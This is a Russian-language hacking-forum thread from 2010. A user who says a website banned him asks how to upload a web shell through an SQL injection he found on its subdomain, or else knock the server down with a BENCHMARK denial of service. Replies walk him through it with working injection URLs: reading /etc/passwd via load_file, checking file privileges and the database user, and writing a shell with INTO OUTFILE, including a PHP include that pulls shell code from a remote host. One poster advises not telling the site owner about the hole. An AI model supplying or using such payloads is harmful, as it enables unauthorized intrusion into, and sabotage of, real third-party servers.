ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
10.06.2010, 13:23
|
|
Новичок
Регистрация: 09.01.2009
Сообщений: 21
Провел на форуме:
195619
Репутация:
10
|
|
Ну как вариант можно и php.ini или httpd.conf переписать если права перлу позволяют и отключить сейфмод.
Или в саппорт хостинга написать чтобы отключили  или поставили права на исполнение твоего перлового скрипта.
Последний раз редактировалось Train; 10.06.2010 в 13:26..
|
|
|
10.06.2010, 15:54
|
|
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279
Репутация:
55
|
|
Вообщем,такая ситуация,нашел скулю на одном из поддоменов нужного мне сайта,скуля раскручивается,бд дампится.Нужно залить шелл через скулю,чтобы добраться на основной домен и другой поддомен,только вот я не могу понять как это сделать,либо просто задосить сервак бенчмарком(если ничего другого не получится).Как это провернуть?
|
|
|
|
10.06.2010, 16:05
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от ~d0s~
Вообщем,такая ситуация,нашел скулю на одном из поддоменов нужного мне сайта,скуля раскручивается,бд дампится.Нужно залить шелл через скулю,чтобы добраться на основной домен и другой поддомен,только вот я не могу понять как это сделать,либо просто задосить сервак бенчмарком(если ничего другого не получится).Как это провернуть?
тебе что нужно? задосить сервер или залить шелл?
|
|
|
|
10.06.2010, 16:06
|
|
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279
Репутация:
55
|
|
Сообщение от Konqi
~dos~ тебе что нужно? задосить сервер или залить шелл?
Первое предпочтительнее 
|
|
|
|
10.06.2010, 16:13
|
|
Участник форума
Регистрация: 06.02.2008
Сообщений: 110
Провел на форуме:
217423
Репутация:
32
|
|
Сообщение от ~d0s~
Вообщем,такая ситуация,нашел скулю на одном из поддоменов нужного мне сайта,скуля раскручивается,бд дампится.Нужно залить шелл через скулю,чтобы добраться на основной домен и другой поддомен,только вот я не могу понять как это сделать,либо просто задосить сервак бенчмарком(если ничего другого не получится).Как это провернуть?
Сначала попробуй залить шелл на взломанный тобой поддомен через найденную тобой скуль. Для этого нужно 3 условия:
1) file_priv - On
2) директория на запись
3) magic_quotes = Off
Как у тебя с правами (file_priv) ?
pinch опередил
|
|
|
|
10.06.2010, 16:07
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
1). сперва проверь magic_quotes_gpc (условие mq=off должен быть, ну если ты чайник, для особо одаренных есть обход https://forum.antichat.ru/showpost.php?p=663815&postcount=39)
2). потом проверь права на чтение/запись файлов
http://test/news.php?id=1+union+select+1,load_file('/etc/passwd'),2,3--
или так
http://test/news.php?id=1+union+select+1,file_priv,2,3+from+my sql_user+where+user='root')--
насчет user-а можешь проверить запросом
http://test/news/php?id=1+union+select+1,user(),2,3--
выдаст root@localhost, пишешь без всяких локалхостов.
3). если все данные пункты выполнились на ура, идем дальше.
http://test/news.php?id=1+union+select+1,'код_шелла',2 ,3+into+outfile+'полный_путь_серве а'--
или если не хочешь заморачиваться (обз. условие allow_url_include=on)
http://test/news.php?id=1+union+select+1,'<?php @include("http://test2/shell.txt"); ?> ',2,3+into+outfile+'полный_путь_серв ера'--
Последний раз редактировалось pinch; 10.06.2010 в 16:13..
|
|
|
|
10.06.2010, 16:17
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от pinch
http://test/news.php?id=1+union+select+1,file_priv,2,3+from+my sql_user+where+user='root')--
с чего ты взял что сервер работает под root-ом ? ))
$user=select+user()+from+mysql.user
select+file_priv+from+mysql.user+where+user=$user (hex/char)
|
|
|
|
10.06.2010, 16:23
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
и в том дело я незнаю как у него обстоят дела, для этого я привел пример под root-ом
а для того чтобы он узнал user-a привел пример как это узнать
насчет user-а можешь проверить запросом
http://test/news/php?id=1+union+select+1,user(),2,3--
|
|
|
|
10.06.2010, 16:59
|
|
Познающий
Регистрация: 21.05.2010
Сообщений: 37
Провел на форуме:
167126
Репутация:
55
|
|
либо просто задосить сервак бенчмарком(если ничего другого не получится)
и нахрена? не можешь сам раскрутить - забей на него, или опубликуй здесь, а не пали владельцу дыру.
Может кому-нибудь тут пригодится.
|
|
|
|
10.06.2010, 17:14
|
|
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279
Репутация:
55
|
|
Сообщение от qq6ka
и нахрена? не можешь сам раскрутить - забей на него, или опубликуй здесь, а не пали владельцу дыру.
Может кому-нибудь тут пригодится.
Дело немного в другом,я уже несколько месяцев ищу баги на том сайте(необоснованно мну там забанили и обматерили),и вот наконец-то нашел скулю на поддомене и чтоб сейчас ее постить в паблик,как-то нелогично и не разумно.Всем спасибо за помощь,буду пытаться что-то сделать...
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
